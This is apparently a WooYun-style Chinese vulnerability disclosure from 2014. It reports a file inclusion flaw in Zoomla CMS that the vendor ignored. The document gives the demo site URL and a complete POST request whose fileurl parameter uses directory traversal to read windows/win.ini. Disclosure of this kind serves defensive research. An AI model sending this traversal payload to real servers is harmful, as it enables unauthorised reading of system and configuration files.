漏洞详情

披露状态:

2014-01-12: 细节已通知厂商并且等待厂商处理中
2014-01-17: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-04-09: 细节向公众公开

简要描述:

逐浪cms文件包含

详细说明:

Url:http://demo.zoomla.cn/Plugins/Doc.aspx

POST:

btnBill=%e7%94%9f%e6%88%90%e5%90%88%e5%90%8c%e5%88%b0%e4%ba%91%e7%9b%98&Button1=%e6%a0%bc%e5%bc%8f%e9%a2%84%e8%a7%88&fileurl=../../../../../../../../../../windows/win.ini&Mydoc=%e6%88%91%e7%9a%84%e5%90%88%e5%90%8c&selCard=&txtDes=&__VIEWSTATE=/wEPDwUKLTMxMTEyOTYzMQ9kFgICAw9kFgJmDxYCHgtfIUl0ZW1Db3VudAIIFhBmD2QWAmYPFQIBMQzlhazlj7jlkIjlkIxkAgEPZBYCZg8VAgEyDOazleW%2bi%2baWh%2bWHvWQCAg9kFgJmDxUCATMQ6LSt6ZSA5ZCI5ZCMLmRvY2QCAw9kFgJmDxUCATQT5Yqz5Yqo5ZCI5ZCM5LmmLmRvY2QCBA9kFgJmDxUCATUZ6K%2bV55So5ZGY5bel6ICD5qC46KGoLmRvY2QCBQ9kFgJmDxUCATYZ5Zui5L2T5Z%2b56K6t55Sz6K%2b36KGoLmRvY2QCBg9kFgJmDxUCATcW57un5om/5p2D6K%2bB5piO5LmmLmRvY2QCBw9kFgJmDxUCATgc6K%2bJ6K686LSi5Lqn5L%2bd5YWo55Sz6K%2b3LmRvY2RkaEU/PNdxxazElafJNZNrFjYXg8spHysdi8MtZ8%2b7cTQ%3d





wenjian.jpg

漏洞证明:

wenjian.jpg

修复方案:

版权声明:转载请注明来源 m1x7e1@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-01-17 11:02

厂商回复:

最新状态:

暂无


漏洞评价: